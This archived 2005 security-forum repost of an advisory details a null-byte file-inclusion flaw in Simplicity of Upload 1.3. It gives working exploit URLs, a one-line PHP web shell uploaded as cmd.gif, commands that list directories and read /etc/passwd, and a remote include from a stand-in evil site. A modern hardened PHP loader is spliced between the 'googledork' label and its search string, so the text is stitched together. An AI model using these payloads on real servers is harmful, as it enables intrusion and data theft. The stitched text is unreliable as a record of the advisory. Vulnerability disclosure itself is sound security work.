EvilOctal Security Team Technical Discussion Group's Archiver

冰血封情 2005-7-30 20:43

[Repost] Simplicity OF Upload 1.3 remote code execution and cross-site scripting vulnerability analysis

Source: http://www.phpsimplicity.com/scripts.php?id=3

remote commands execution:

problem at lines 25-30:
...
//check for language overriding..
if (isset($_GET['language']))
    $language = strtolower($_GET['language']);

//now we include the language file
require_once("$language.lng");
...

you can include whatever you want by adding a null byte to the "language" parameter value:

example:
http://localhost:30/simply/download.php?language=upload.php%00

you will see the upload & download pages together :)

so you can upload a cmd.gif file (when you upload a .php file, it is usually
renamed to .html...) with this php code inside to execute
commands:

<?php

system($HTTP_GET_VARS[command]);

?>

then try this url:

http://[target]/[path]/download.php?language=cmd.gif%00&command=ls

to list directories

http://[target]/[path]/download.php?language=cmd.gif%00&command=cat%20/etc/passwd

to show the /etc/passwd file

cross site scripting:

also, a remote user can supply a specially crafted URL to redirect other people
to an evil page:

http://[target]/[path]/download.php?language=http://[evil_site]/[evil_page]%00

googledork:
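Both issues above come from the same line: `require_once("$language.lng")` takes the file name straight from the request, so a null byte cuts off the ".lng" suffix and a URL turns the include into a remote one. A hardened replacement for that language loader, added here as an illustration and not code from the advisory or from the Simplicity of Upload project (the `lang/` directory and the `english` default are assumptions):

```php
<?php
// Hardened language loader (added example). Instead of trusting the string,
// resolve it to one of the .lng files that actually exist in a fixed directory.
define('LANG_DIR', __DIR__ . '/lang');   // assumed location of the *.lng files

function resolve_language_file(string $requested, string $default = 'english'): ?string
{
    // Only short lowercase names pass: no "/", "\", ".", ":", "%00" or "http://".
    // \z (not $) so a trailing newline cannot sneak past the check either.
    if (!preg_match('/^[a-z]{1,32}\z/', $requested)) {
        $requested = $default;
    }

    // Allowlist built from the directory listing, so the request can only
    // ever name a language file that ships with the application.
    $allowed = array_map(
        fn($f) => basename($f, '.lng'),
        glob(LANG_DIR . '/*.lng') ?: []
    );
    if (!in_array($requested, $allowed, true)) {
        return null;
    }

    // Defence in depth: realpath() follows symlinks, so confirm the resolved
    // file still sits inside LANG_DIR before handing it to require_once.
    $real = realpath(LANG_DIR . '/' . $requested . '.lng');
    $base = realpath(LANG_DIR);
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

$language = 'english';
if (isset($_GET['language'])) {
    $language = strtolower((string) $_GET['language']);
}

$file = resolve_language_file($language);
if ($file === null) {
    http_response_code(400);
    exit('unknown language');
}
require_once $file;
```

With this loader a request such as `?language=cmd.gif%00` or `?language=http://...` never reaches `require_once`; it fails the pattern check, falls back to the default, and only files enumerated from `lang/` can be included.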

"Powered By: Simplicity oF Upload"

rgod
email: rgod[at]autistici.org
site: http://rgod.altervista.org
original advisory: http://rgod.altervista.org/simply.html

© 1999-2008 EvilOctal Security Team